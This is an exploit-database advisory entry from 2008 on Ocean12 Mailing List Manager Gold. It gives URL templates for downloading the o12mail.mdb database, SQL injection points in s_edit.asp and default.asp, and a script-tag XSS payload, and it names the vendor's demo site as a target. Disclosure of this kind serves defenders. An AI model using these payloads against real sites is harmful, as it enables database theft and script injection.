Ocean12 Mailing List Manager Gold

vendor:

by:

Pouya_Server

7.5

CVSS

HIGH

DD,SQL,XSS

89,79,79

CWE

Product Name: Ocean12 Mailing List Manager Gold

Affected Version From: N/A

Affected Version To: N/A

Patch Exists: Yes

Related CWE: N/A

CPE: ocean12tech.com/products/o12mailgold

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2008

Ocean12 Mailing List Manager Gold

The vulnerability exists in the Ocean12 Mailing List Manager Gold application. It is possible to inject malicious SQL and XSS payloads via the 'email' and 'Name' parameters in the 's_edit.asp' and 'default.asp' scripts. It is also possible to download the 'o12mail.mdb' file which contains sensitive information.

Mitigation:

Update to the latest version of the application

Source

Exploit-DB raw data:

#########################################################
---------------------------------------------------------
Portal Name: Ocean12 Mailing List Manager Gold
Vendor : http://ocean12tech.com/products/o12mailgold
Author : Pouya_Server , Pouya.s3rver@Gmail.com
Vulnerability : (DD,SQL,XSS)
---------------------------------------------------------
#########################################################
[DD]:
http://site.com/[Path]/o12mail.mdb
[SQL]:
http://site.com/[Path]/s_edit.asp?email=[SQL]
http://site.com/[Path]/default.asp?Page=2&Email='[SQL]
[XSS]:
http://site.com/[Path]/default.asp?Error=Pouya_Server&Name=&Email=Pouya.s3rver@gmail.com"><ScRiPt%20%0a%0d>alert(1369)%3B</ScRiPt>

---------------------------------
Victem :
http://ocean12tech.com/products/o12mailgold/demo

# milw0rm.com [2008-12-02]